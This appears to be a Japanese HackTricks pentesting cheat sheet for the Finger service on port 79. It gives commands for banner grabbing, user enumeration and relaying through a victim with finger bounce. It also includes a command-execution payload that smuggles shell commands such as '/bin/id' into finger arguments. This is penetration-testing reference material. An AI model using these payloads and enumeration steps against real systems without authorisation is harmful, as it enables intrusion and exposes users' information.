# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **基本情報** **Finger** プログラム/サービスは、コンピュータユーザーに関する詳細を取得するために利用されます。通常、提供される情報には **ユーザーのログイン名、フルネーム** が含まれ、場合によっては追加の詳細も含まれます。これらの追加の詳細には、オフィスの場所や電話番号(利用可能な場合)、ユーザーがログインした時間、非アクティブ期間(アイドル時間)、ユーザーが最後にメールを読んだ時刻、ユーザーのプランやプロジェクトファイルの内容が含まれることがあります。 **デフォルトポート:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **列挙** ### **バナー取得/基本接続** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **ユーザー列挙** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` 代わりに、[**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)からの**finger-user-enum**を使用できます。いくつかの例: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmapはデフォルトスクリプトを使用してスクリプトを実行する** ### MetasploitはNmapよりも多くのトリックを使用する ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## コマンド実行 ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## フィンガーバウンス [システムをフィンガーリレーとして使用する](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}